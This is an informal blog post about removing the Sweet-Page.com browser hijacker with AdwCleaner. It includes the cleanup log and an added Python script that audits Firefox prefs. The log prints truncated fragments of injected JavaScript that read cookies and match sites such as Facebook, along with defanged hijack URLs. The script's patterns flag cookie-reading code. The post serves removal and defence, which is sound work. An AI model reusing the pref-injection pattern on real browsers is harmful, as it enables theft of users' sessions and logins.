Hey guys, I'm back again. This time I've got a really effective tip for you. A little while ago this tip saved my browser. So, yesterday the HOMEPAGE of my browser (Mozilla Firefox) changed to Sweet-Page.com. Normally, when you open Mozilla you land straight on the 'google search engine', right? Well, yesterday was different: I opened Mozilla and got Sweet-Page.com instead.
I got suspicious about what Sweet-Page actually is. Since I'm the suspicious type, I googled it right away. It turns out it's a kind of "virus" in the form of a "browser hijacker".
The most dangerous effect of this virus is that it can steal your valuable data, such as your email and its password, your M-Banking data, and other shameful deeds. What do you expect, Sweet-page.com never went to Quran class as a kid.. *wait, what
In more detail, their 'shameful' deeds include:
1. Changing the default homepage / the homepage setting we have configured, at the moment the internet browser starts. For example: if your default homepage is Google, it becomes Sweet-page.com, as in the image above.
2. Changing the default search engine every time you open the browser or a new tab to the hijacker's search engine, as seen in the picture above.
3. Spying on our browsing habits based on cookies and the history of the sites we visit, so you get stuffed with all kinds of very annoying ads.
And why did sweet-page.com end up on my laptop?
Good question! Yesterday I downloaded some free software from a shady website.
You've probably been through something this annoying too. So stay alert, guys. FYI, there are other browser hijackers besides sweet-page.com. Among them: Start.Qone8.com, MySearch, ShopNav, AboutBlank, CoolWebSearch, CoolWebSearch.image, Onlinestability.com, Security Toolbar, HeretoFind, and many more.
Back to sweet-page.com....
According to Malware Tips, a site that shares how to remove Sweet-Page and other malware:
"Sweet-Page.com is a browser hijacker, which is promoted via other free downloads, and once installed it will change your browser homepage to sweet-page.com."
Bottom line, the Sweet-Page.com "virus" malware has to be deleted, exterminated, killed!
Here's how:
Download AdwCleaner from this link: ADWCLEANER DOWNLOAD LINK (This link will automatically download AdwCleaner on your computer).
Before installing AdwCleaner, close all programs and internet browsers that are open.
Double-click the AdwCleaner icon you just downloaded (the install process).
Once the install is done, AdwCleaner will open.
Click the Scan button.
When the scan finishes, click the Clean button. Kill them all!
Here's the result of AdwCleaner's work on my computer, which also removed the Sweet-Page.com malware.
# AdwCleaner v3.023 - Report created 04/04/2014 at 23:35:16
# Updated 01/04/2014 by Xplode
# Operating System : Windows 7 Ultimate (32 bits)
# Username : 1 - 1-PC
# Running from : D:\DOWNLOADS\adwcleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
Folder Deleted : C:\ProgramData\boost_interprocess
Folder Deleted : C:\ProgramData\SNT
Folder Deleted : C:\ProgramData\WPM
Folder Deleted : C:\Program Files\Mega Browse
Folder Deleted : C:\Program Files\SNT
Folder Deleted : C:\Users\1\AppData\Local\Mobogenie
Folder Deleted : C:\Users\1\AppData\Local\torch
Folder Deleted : C:\Users\1\AppData\Local\Temp\Mega Browse
Folder Deleted : C:\Users\1\Documents\Mobogenie
Folder Deleted : C:\Users\FAMILY\AppData\Local\Conduit
Folder Deleted : C:\Users\FAMILY\AppData\Local\NativeMessaging
Folder Deleted : C:\Users\FAMILY\AppData\Local\torch
Folder Deleted : C:\Users\FAMILY\AppData\Local\Temp\NativeMessaging
Folder Deleted : C:\Users\FAMILY\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\FAMILY\AppData\Roaming\baidu
File Deleted : C:\END
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\searchplugins\WebSearch.xml
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\user.js
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\user.js
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage-journal
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage-journal
***** [ Shortcuts ] *****
Shortcut Disinfected : C:\Users\Public\Desktop\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\Desktop\Firefox NEW.lnk
Shortcut Disinfected : C:\Users\1\Desktop\Firefox OLD.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
***** [ Registry ] *****
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\LiveSupport_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\livesupport_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Data Restored : HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\supWPM
***** [ Browsers ] *****
-\\ Internet Explorer v8.0.7600.16385
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
-\\ Mozilla Firefox v28.0 (en-US)
[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\prefs.js ]
Line Deleted : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");
Line Deleted : user_pref("browser.search.order.1", "WebSearch");
Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Deleted : user_pref("extensions.0sd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.2Mua0n5fa.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted : user_pref("extensions.IwfG.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumoro[...]
Line Deleted : user_pref("extensions.L1CjSWwAf.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted : user_pref("keyword.URL", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");
[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\prefs.js ]
Line Deleted : user_pref("browser.startup.homepage", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51");
[ File : C:\Users\FAMILY\AppData\Roaming\Mozilla\Firefox\Profiles\cttpyw9p.default\prefs.js ]
-\\ Google Chrome v33.0.1750.154
[ File : C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\preferences ]
[ File : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\preferences ]
*************************
AdwCleaner[R0].txt - [39744 octets] - [28/02/2014 21:45:46]
AdwCleaner[R1].txt - [9773 octets] - [04/04/2014 23:33:36]
AdwCleaner[S0].txt - [36508 octets] - [28/02/2014 21:48:20]
AdwCleaner[S1].txt - [7978 octets] - [04/04/2014 23:35:16]
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [8038 octets] ##########
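The Firefox part of the log shows where the hijack actually lives: homepage and search preferences in prefs.js, plus script stored in `extensions.*.scode` prefs. The check below is an added example, not part of the original post or of AdwCleaner; it audits a prefs.js or user.js for those same preference names. The allowlist values, the function names and the sample file (with the placeholder domain hijacker.example) are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Assumptions for this example: what the profile's owner considers legitimate.
TRUSTED_HOSTS = {"www.google.com"}
TRUSTED_ENGINES = {"Google"}

# Preference names as they appear in the AdwCleaner log above.
URL_PREFS = {"browser.startup.homepage", "browser.search.defaulturl", "keyword.URL"}
ENGINE_PREF = re.compile(r"^browser\.search\.(defaultenginename|selectedEngine|order\.\d+)(,S)?$")
PREF_LINE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.*)\);\s*$', re.M)

def parse_prefs(text):
    """Yield (name, value) per user_pref() line; string values are unquoted."""
    for name, raw in PREF_LINE.findall(text):
        if len(raw) >= 2 and raw[0] == raw[-1] == '"':
            raw = raw[1:-1].replace('\\"', '"')
        yield name, raw

def untrusted_url(value):
    """True if any '|'-separated entry is an http(s) URL outside the allowlist."""
    for entry in value.split("|"):
        parts = urlsplit(entry.strip())
        if parts.scheme in ("http", "https") and parts.hostname not in TRUSTED_HOSTS:
            return True
    return False

def audit_prefs(text):
    """Return (pref name, reason) findings for one prefs.js or user.js file."""
    findings = []
    for name, value in parse_prefs(text):
        if name in URL_PREFS and untrusted_url(value):
            findings.append((name, "homepage/search URL outside allowlist"))
        elif ENGINE_PREF.match(name) and value not in TRUSTED_ENGINES:
            findings.append((name, "unexpected search engine"))
        elif name.endswith(".scode") or "document.cookie" in value:
            findings.append((name, "script stored in a preference"))
    return findings

# Constructed sample (hijacker.example is a placeholder), not a real profile.
SAMPLE_PREFS = '''
user_pref("browser.startup.homepage", "http://start.hijacker.example/?pid=1");
user_pref("browser.search.selectedEngine,S", "WebSearch");
user_pref("extensions.abc.scode", "(function(){var u=location.href+document.cookie;})();");
user_pref("browser.search.order.1", "Google");
'''

if __name__ == "__main__":
    for name, reason in audit_prefs(SAMPLE_PREFS):
        print(f"{name}: {reason}")
```

Run it against user.js as well as prefs.js: Firefox reapplies user.js at every start, so a hijacked entry there restores the unwanted homepage even after prefs.js is fixed, which is why the log shows user.js deleted in two profiles.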
Finally, AdwCleaner did a great job removing that virus from my laptop. Thank you AdwCleaner, and special thanks to the fellow bloggers who shared this cool tip. My last message: don't carelessly download and install software, especially from free links or sites! Be careful......! Crime is all around you, even from places you never expected...!
See U Next Post...!